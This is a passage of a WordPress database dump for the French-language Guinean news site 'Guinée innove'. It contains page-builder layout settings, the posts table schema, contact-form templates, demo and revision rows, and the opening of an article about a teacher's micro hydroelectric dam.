gzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3126,935,'_elementor_version','0.4'),(3127,935,'_elementor_css','a:3:{s:4:\"time\";i:1511347884;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3128,360,'_elementor_css','a:3:{s:4:\"time\";i:1511782401;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3131,930,'_yoast_wpseo_focuskw_text_input','Open Budget initiative'),(3132,930,'_yoast_wpseo_focuskw','Open Budget initiative'),(3133,930,'_yoast_wpseo_linkdex','58'),(3138,839,'_li_love_count','1'),(3139,938,'_wp_trash_meta_status','publish'),(3140,938,'_wp_trash_meta_time','1512392621'),(3141,939,'_wp_trash_meta_status','publish'),(3142,939,'_wp_trash_meta_time','1512392706'),(3143,940,'_wp_trash_meta_status','publish'),(3144,940,'_wp_trash_meta_time','1512392791');
/*!40000 ALTER TABLE `wpfy_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_posts`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=941 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_posts`
--

LOCK TABLES `wpfy_posts` WRITE;
/*!40000 ALTER TABLE `wpfy_posts` DISABLE KEYS */;
INSERT INTO `wpfy_posts` VALUES (2,1,'2017-10-23 13:48:44','2017-10-23 13:48:44','','Technologie','','publish','closed','open','','technologie','','','2017-11-01 15:35:41','2017-11-01 15:35:41','',0,'https://guineeinnove.nimbasolution.com/?page_id=2',0,'page','',0),(4,1,'2017-01-20 08:01:15','2017-01-20 08:01:15','<div id=\"contact\"  class=\"transparent\">\n<div class=\"form\">\n<div class=\"border\">\n[text* name id:name placeholder \"Name\"]\n[text* email id:email placeholder \"Email\"]\n[text* subject id:subject placeholder \"Subject\"]\n<br>\n[textarea message 45x8 id:message-form placeholder \"Message Here\"]\n[submit class:submit \"Send\"]\n</div>\n</div>\n</div>\nDemo 7 \"[your-subject]\"\n[your-name] <wordpress@192.168.1.7>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Demo 7 (http://demo7.magzma.com)\nadmin.themesawesome@gmail.com\nReply-To: [your-email]\n\n\n\n\nDemo 7 \"[your-subject]\"\nDemo 7 <wordpress@192.168.1.7>\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Demo 7 (http://demo7.magzma.com)\n[your-email]\nReply-To: admin.themesawesome@gmail.com\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2017-01-20 08:01:15','2017-01-20 08:01:15','',0,'http://demo7.magzma.com/?post_type=wpcf7_contact_form&amp;p=4',0,'wpcf7_contact_form','',0),(5,1,'2017-10-23 13:50:37','2017-10-23 13:50:37','<label> Votre nom (obligatoire)\n    [text* your-name] </label>\n\n<label> Votre e-mail (obligatoire)\n    [email* your-email] </label>\n\n<label> Sujet\n    [text your-subject] </label>\n\n<label> Votre message\n    [textarea your-message] </label>\n\n[submit \"Envoyer\"]\nGuinée innove \"[your-subject]\"\n[your-name] <admin@guineeinnove.nimbasolution.com>\nDe : [your-name] <[your-email]>\nSujet : [your-subject]\n\nCorps du message :\n[your-message]\n\n-- \nCet e-mail a été envoyé via le formulaire de contact de Guinée innove (https://guineeinnove.nimbasolution.com)\nadmin@guineeinnove.nimbasolution.com\nReply-To: [your-email]\n\n0\n0\n\nGuinée innove \"[your-subject]\"\nGuinée innove <admin@guineeinnove.nimbasolution.com>\nCorps du message :\n[your-message]\n\n-- \nCet e-mail a été envoyé via le formulaire de contact de Guinée innove (https://guineeinnove.nimbasolution.com)\n[your-email]\nReply-To: admin@guineeinnove.nimbasolution.com\n\n0\n0\nMerci pour votre message. Il a été envoyé.\nUne erreur s’est produite lors de l’envoi de votre message. Veuillez essayer à nouveau plus tard.\nUn ou plusieurs champs contiennent une erreur. Veuillez vérifier et essayer à nouveau.\nUne erreur s’est produite lors de l’envoi de votre message. Veuillez essayer à nouveau plus tard.\nVous devez accepter les termes et conditions avant d\'envoyer votre message.\nCe champ est obligatoire.\nLe champ est trop long.\nLe champ est trop court.','Formulaire de contact 1','','publish','closed','closed','','formulaire-de-contact-1','','','2017-10-23 13:50:37','2017-10-23 13:50:37','',0,'https://guineeinnove.nimbasolution.com/?post_type=wpcf7_contact_form&p=5',0,'wpcf7_contact_form','',0),(357,1,'2017-02-02 04:25:39','2017-02-02 04:25:39','','Magzma Demo 7','','publish','closed','closed','','magzma-demo-7','','','2017-02-02 04:25:39','2017-02-02 04:25:39','',0,'http://demo7.magzma.com/?elementor_library=magzma-demo-7',0,'elementor_library','',0),(359,1,'2017-01-20 07:45:01','2017-01-20 07:45:01','','Société','','publish','closed','open','','societe','','','2017-11-01 16:02:28','2017-11-01 16:02:28','',0,'http://demo7.magzma.com/?page_id=2',0,'page','',0),(360,1,'2017-01-24 07:46:11','2017-01-24 07:46:11','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','publish','closed','closed','','accueil','','','2017-11-27 11:32:39','2017-11-27 11:32:39','',0,'http://demo7.magzma.com/?page_id=5',0,'page','',0),(361,1,'2017-02-02 04:49:34','2017-02-02 04:49:34','<p>At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus.</p><p>Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.</p><p><strong>Telephone :</strong></p><p>+0028 55 67 67</p><p><strong>Email</strong><strong>:</strong></p><p>jennier_aster@yourdomain.com</p><p><strong>Address :</strong></p><p>590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States</p>','Magzma Contact 1','','publish','closed','closed','','magzma-contact-1','','','2017-02-02 04:49:34','2017-02-02 04:49:34','',0,'http://demo7.magzma.com/?elementor_library=magzma-contact-1',0,'elementor_library','',0),(362,1,'2017-02-02 04:49:45','2017-02-02 04:49:45','\n			<ul>\n									<li>\n						<a href=\"#\" title=\"Edit\">\n							Edit\n						</a>\n					</li>\n									<li>\n						<a href=\"#\" title=\"Duplicate\">\n							Duplicate\n						</a>\n					</li>\n									<li>\n						<a href=\"#\" title=\"Remove\">\n							Remove\n						</a>\n					</li>\n							</ul>\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.com/maps?q=London+Eye%2C+London%2C+United+Kingdom&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\"></iframe>		\n			<ul>\n									<li>\n						<a href=\"#\" title=\"Edit\">\n							Edit\n						</a>\n					</li>\n									<li>\n						<a href=\"#\" title=\"Duplicate\">\n							Duplicate\n						</a>\n					</li>\n									<li>\n						<a href=\"#\" title=\"Remove\">\n							Remove\n						</a>\n					</li>\n							</ul>\n			<p style=\"font-size: 16px; color: #999999;\">In case you some questions popped in your mind, Feel free to call, email or even visit us. Also you can write us about whatever you want down below. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit odio ante, id dapibus elit condimentum vitae. Maecenas eget orci vitae enim accumsan mollis. In congue nunc velit, sit amet eleifend velit cursus vitae.</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Telephone :</strong> +0028 55 67 67</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Email :</strong> jennier_aster@yourdomain.com</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Address :</strong> 590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States</p>		\n		','Magzma Contact 2','','publish','closed','closed','','magzma-contact-2','','','2017-02-02 04:49:45','2017-02-02 04:49:45','',0,'http://demo7.magzma.com/?elementor_library=magzma-contact-2',0,'elementor_library','',0),(363,1,'2017-02-02 05:15:31','2017-01-31 08:54:40','\n			<h3>+224 625 27 22 90</h3>		\n			<h3>+224 664 61 36 77</h3>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.com/maps?q=kaloum&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\"></iframe>		\n		','Nous Contacter','','publish','closed','closed','','contact-2','','','2017-11-01 16:25:25','2017-11-01 16:25:25','',0,'http://demo7.magzma.com/contact-2/',0,'page','',0),(375,1,'2017-10-23 16:25:54','2017-10-23 16:25:54','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-23 16:25:54','2017-10-23 16:25:54','',360,'https://guineeinnove.nimbasolution.com/2017/10/23/360-revision-v1/',0,'revision','',0),(376,1,'2017-10-25 13:36:58','2017-10-25 13:36:58','&nbsp;\n<h3>Populaires</h3>\n<h3>Videos</h3>\nhttps://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&amp;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o\n<h3>Technologie</h3>\n<h3>Agriculture</h3>\n<h3>Autres</h3>','A','','inherit','closed','closed','','360-autosave-v1','','','2017-10-25 13:36:58','2017-10-25 13:36:58','',360,'https://guineeinnove.nimbasolution.com/2017/10/23/360-autosave-v1/',0,'revision','',0),(377,1,'2017-10-23 16:27:16','2017-10-23 16:27:16','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\r\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\r\n...or something like this:\r\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\r\nAs a new WordPress user, you should go to <a href=\"https://guineeinnove.nimbasolution.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','TECHNOLOGIE','','inherit','closed','closed','','2-revision-v1','','','2017-10-23 16:27:16','2017-10-23 16:27:16','',2,'https://guineeinnove.nimbasolution.com/2017/10/23/2-revision-v1/',0,'revision','',0),(378,1,'2017-10-23 16:27:31','2017-10-23 16:27:31','','Agriculture','','publish','closed','closed','','agriculture','','','2017-11-01 15:45:36','2017-11-01 15:45:36','',0,'https://guineeinnove.nimbasolution.com/?page_id=378',0,'page','',0),(379,1,'2017-10-23 16:27:31','2017-10-23 16:27:31','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-23 16:27:31','2017-10-23 16:27:31','',378,'https://guineeinnove.nimbasolution.com/2017/10/23/378-revision-v1/',0,'revision','',0),(380,1,'2017-10-23 16:27:56','2017-10-23 16:27:56','','Economie','','publish','closed','closed','','economie','','','2017-11-01 15:39:24','2017-11-01 15:39:24','',0,'https://guineeinnove.nimbasolution.com/?page_id=380',0,'page','',0),(381,1,'2017-10-23 16:27:56','2017-10-23 16:27:56','','ECONOMIE','','inherit','closed','closed','','380-revision-v1','','','2017-10-23 16:27:56','2017-10-23 16:27:56','',380,'https://guineeinnove.nimbasolution.com/2017/10/23/380-revision-v1/',0,'revision','',0),(382,1,'2017-10-23 16:28:36','2017-10-23 16:28:36','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\r\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\r\n...or something like this:\r\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\r\nAs a new WordPress user, you should go to <a href=\"http://demo7.magzma.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','SOCIETE','','inherit','closed','closed','','359-revision-v1','','','2017-10-23 16:28:36','2017-10-23 16:28:36','',359,'https://guineeinnove.nimbasolution.com/2017/10/23/359-revision-v1/',0,'revision','',0),(383,1,'2017-10-23 16:30:06','2017-10-23 16:30:06','','Santé','','publish','closed','closed','','sante','','','2017-11-01 15:47:38','2017-11-01 15:47:38','',0,'https://guineeinnove.nimbasolution.com/?page_id=383',0,'page','',0),(384,1,'2017-10-23 16:30:06','2017-10-23 16:30:06','','SANTE','','inherit','closed','closed','','383-revision-v1','','','2017-10-23 16:30:06','2017-10-23 16:30:06','',383,'https://guineeinnove.nimbasolution.com/2017/10/23/383-revision-v1/',0,'revision','',0),(385,1,'2017-10-23 16:30:27','2017-10-23 16:30:27','','Culture','','publish','closed','closed','','culture','','','2017-11-01 15:57:34','2017-11-01 15:57:34','',0,'https://guineeinnove.nimbasolution.com/?page_id=385',0,'page','',0),(386,1,'2017-10-23 16:30:27','2017-10-23 16:30:27','','CULTURE','','inherit','closed','closed','','385-revision-v1','','','2017-10-23 16:30:27','2017-10-23 16:30:27','',385,'https://guineeinnove.nimbasolution.com/2017/10/23/385-revision-v1/',0,'revision','',0),(388,1,'2017-10-23 16:33:58','2017-10-23 16:33:58',' ','','','publish','closed','closed','','388','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=388',7,'nav_menu_item','',0),(389,1,'2017-10-23 16:33:58','2017-10-23 16:33:58',' ','','','publish','closed','closed','','389','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=389',6,'nav_menu_item','',0),(390,1,'2017-10-23 16:33:57','2017-10-23 16:33:57',' ','','','publish','closed','closed','','390','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=390',3,'nav_menu_item','',0),(391,1,'2017-10-23 16:33:57','2017-10-23 16:33:57',' ','','','publish','closed','closed','','391','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=391',5,'nav_menu_item','',0),(392,1,'2017-10-23 16:33:57','2017-10-23 16:33:57',' ','','','publish','closed','closed','','392','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=392',2,'nav_menu_item','',0),(393,1,'2017-10-23 16:33:57','2017-10-23 16:33:57',' ','','','publish','closed','closed','','393','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=393',1,'nav_menu_item','',0),(399,1,'2017-10-24 13:08:27','2017-10-24 13:08:27','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:08:27','2017-10-24 13:08:27','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(402,1,'2017-10-24 13:17:28','2017-10-24 13:17:28','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:17:28','2017-10-24 13:17:28','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(403,1,'2017-10-24 13:22:14','2017-10-24 13:22:14','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:22:14','2017-10-24 13:22:14','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(404,1,'2017-10-24 13:25:35','2017-10-24 13:25:35','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:25:35','2017-10-24 13:25:35','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(405,1,'2017-10-24 13:45:12','2017-10-24 13:45:12','<p class=\"story-body__introduction\">Certains disent de lui qu\'il a \"ramené la lumière dans les ténèbres de Bolodou\", une localité située dans la préfecture de Guéckédou (une subdivision de la région de Nzérékoré) dans le Sud-Est de la Guinée.</p>\r\nExcédé par la situation dans sa localité, Ibrahima Tounkara, enseignant de Mathématiques, a construit un micro-barrage hydroélectrique sur le marigot Gbasso, l\'un des cours d\'eau qui arrosent cette commune rurale.\r\n\r\n<aside class=\"quote\">\r\n<div class=\"quote-inner\">\r\n<blockquote class=\"quote\">Quand j\'ai dit aux villageois que je comptais réaliser un mini-barrage hydroélectrique, personne ne m\'a cru. 